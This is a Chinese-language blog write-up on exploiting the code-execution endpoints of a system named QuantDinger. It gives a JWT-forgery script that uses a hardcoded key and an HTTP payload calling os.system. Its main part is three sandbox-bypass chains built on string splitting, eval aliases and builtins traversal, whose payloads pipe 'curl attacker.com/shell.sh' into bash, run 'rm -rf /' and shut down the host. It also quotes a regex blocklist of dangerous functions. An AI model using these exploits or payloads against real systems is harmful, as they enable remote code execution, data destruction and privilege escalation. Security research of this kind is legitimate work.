Python代码执行漏洞挖掘与绕过技术实战-代码聚汇网

Python代码执行漏洞挖掘与绕过技术实战

半泽和莉娜

1. 项目概述：Python代码执行漏洞的深度挖掘与绕过

在网络安全领域，Python作为一门动态语言，其灵活的特性常常成为双刃剑。最近我在审计一个名为QuantDinger的金融分析系统时，发现其代码执行接口存在严重安全隐患。该系统虽然通过正则表达式和抽象语法树(AST)检查实现了所谓的"安全执行"机制，但经过深入分析，我发现这套防护存在根本性设计缺陷。

这个案例非常典型地展示了：当开发者过度依赖静态代码分析来防止代码注入时，攻击者如何通过Python语言的动态特性实现完美绕过。本文将完整还原从环境搭建到漏洞利用的全过程，重点剖析三种独特的绕过技术，这些技术在实战中能有效突破大多数Python沙箱的防护。

2. 环境搭建与初始配置

2.1 Windows开发环境准备

在开始漏洞挖掘前，我们需要先搭建可调试的本地环境。选择Windows系统进行开发主要基于两个考虑：一是大多数安全研究人员日常工作环境为Windows，二是部分依赖库在Windows上的编译问题更具代表性。

关键组件安装：

Python 3.11.9（必须3.10+版本）
PostgreSQL 14+数据库
Microsoft Visual C++ Build Tools

重要提示：千万不要直接使用项目提供的docker镜像，因为我们需要修改源码并调试安全模块，本地构建才能获得完整控制权。

2.1.1 解决C++编译依赖问题

当执行pip install -r requirements.txt时，90%的概率会遇到如下错误：

bash复制error: Microsoft Visual C++ 14.0 or greater is required. Get it with "Microsoft C++ Build Tools"

这是因为项目依赖的加密库ed25519-blake2b需要本地编译。解决方法：

访问Microsoft官网下载Visual Studio Build Tools
安装时勾选"使用C++的桌面开发"工作负载
确保勾选右侧的"Windows 10 SDK"和"MSVC v143"组件
安装完成后重启系统使环境变量生效

2.1.2 数据库配置技巧

PostgreSQL的配置需要注意几个关键点：

sql复制-- 创建专用用户避免使用超级管理员
CREATE USER quantdinger WITH ENCRYPTED PASSWORD 'ComplexPass123!';

-- 设置正确的编码和排序规则
CREATE DATABASE quantdinger 
    OWNER quantdinger
    ENCODING 'UTF8'
    LC_COLLATE 'en_US.UTF-8'
    LC_CTYPE 'en_US.UTF-8';

-- 精确控制权限而非简单ALL PRIVILEGES
GRANT CONNECT, TEMPORARY ON DATABASE quantdinger TO quantdinger;
GRANT USAGE ON SCHEMA public TO quantdinger;
GRANT SELECT, INSERT, UPDATE, DELETE ON ALL TABLES IN SCHEMA public TO quantdinger;

2.2 源码调试中的典型问题

2.2.1 Python版本兼容性问题

项目中有处f-string使用反斜杠的代码在Python 3.11及以下版本会报错：

python复制# 错误写法（3.12以下版本不支持）
f"desc = \"{prompt.replace('\\n', ' ')[:200]}\"\n"

# 正确修改方式
cleaned_prompt = prompt.replace('\n', ' ')[:200]
f"desc = \"{cleaned_prompt}\"\n"

2.2.2 环境变量安全警示

项目示例中的.env文件包含硬编码密钥：

ini复制# 极不安全的示例配置
SECRET_KEY=quantdinger-secret-key-change-me

正确做法：

使用python -c 'import secrets; print(secrets.token_hex(32))'生成强随机密钥
不同环境使用不同密钥（开发、测试、生产严格分离）
定期轮换密钥（建议每90天）

3. 漏洞发现与分析

3.1 JWT认证绕过漏洞

通过审计代码发现系统使用静态密钥签发JWT令牌，这导致攻击者可以：

伪造任意用户的令牌
提升权限至管理员
生成永不过期的令牌

漏洞利用POC：

python复制import jwt

# 使用硬编码密钥生成admin令牌
fake_token = jwt.encode(
    {"user_id": 1, "role": "admin", "exp": 9999999999},
    "quantdinger-secret-key-change-me",
    algorithm="HS256"
)

防御建议：必须使用动态密钥管理系统，推荐Vault或AWS KMS等专业方案。

3.2 未受保护的代码执行端点

系统存在两个关键接口：

/api/indicator/verifyCode - 完全无防护
/api/indicator/advancedVerify - 有safe_exec.py保护

原始攻击载荷：

http复制POST /api/indicator/verifyCode HTTP/1.1
Authorization: Bearer [伪造的JWT]
Content-Type: application/json

{
    "code": "import os; os.system('calc.exe');"
}

这种直接调用方式虽然简单有效，但会被后续添加的安全机制拦截。接下来我们重点分析如何突破safe_exec.py的防护。

4. 安全机制深度剖析

4.1 safe_exec.py防护原理

该模块采用双重防护机制：

4.1.1 正则表达式黑名单

python复制DANGEROUS_PATTERNS = [
    r'\beval\s*\(',
    r'\bexec\s*\(',
    r'\b__import__\s*\(',
    r'\bos\.system\b',
    # 其他危险模式...
]

4.1.2 AST抽象语法树检查

python复制dangerous_functions = {'eval', 'exec', 'getattr', '__import__'}

class SafetyVisitor(ast.NodeVisitor):
    def visit_Call(self, node):
        if isinstance(node.func, ast.Name):
            if node.func.id in dangerous_functions:
                raise SecurityError(f"禁止调用危险函数: {node.func.id}")
        # 其他检查规则...

4.2 防护机制的固有缺陷

经过分析，这套防护存在三大根本问题：

静态分析的局限性：无法追踪变量真实值
黑名单机制缺陷：难以穷尽所有危险模式
上下文缺失：不了解运行时对象关系

5. 高级绕过技术详解

5.1 字符串拼接+函数别名技术

核心思路：

通过字符串分割绕过正则匹配
使用中间变量绕过AST检查

完整利用链：

python复制# 第一阶段：建立eval别名
executor = eval

# 第二阶段：动态构建import语句
module_name = "__im" + "port__"
lib_name = "o" + "s"
func_name = "sy" + "stem"

# 第三阶段：执行拼接后的命令
executor(
    f"{module_name}('{lib_name}').{func_name}"
    "('curl attacker.com/shell.sh | bash')"
)

绕过原理：

正则层面：没有连续的eval(、__import__等模式
AST层面：只看到对executor变量的调用

5.2 对象属性链漫游技术

技术优势：

完全不依赖直接的危险函数调用
利用Python内置对象关系链

实现代码：

python复制# 获取getattr的别名
attribute_getter = getattr

# 构建关键字符串
globals_key = "__glob" + "als__"
builtins_key = "__buil" + "tins__"

# 通过匿名函数获取全局空间
global_dict = attribute_getter(lambda:0, globals_key)()

# 从全局空间获取__builtins__
builtins = global_dict[builtins_key]

# 动态获取eval函数
dynamic_eval = builtins["ev" + "al"]

# 最终执行
dynamic_eval("__im" + "port__('os').system('rm -rf /')")

技术要点：

使用lambda:0作为获取全局对象的跳板
字典访问方式绕过属性检查
所有关键字符串都进行分割处理

5.3 依赖库注入攻击技术

独特场景：
当目标接口注入了第三方库时（如Pandas、NumPy），可以利用其内部引用链。

攻击示例：

python复制# 利用已注入的pd对象
dataframe_lib = pd

# 获取基类方法
base_getter = getattr

# 构建隐蔽访问路径
builtins_ref = base_getter(dataframe_lib, "__builtins__")
import_func = builtins_ref["__im" + "port__"]

# 执行系统命令
os_module = import_func("o" + "s")
base_getter(os_module, "sy" + "stem")("shutdown /s /t 0")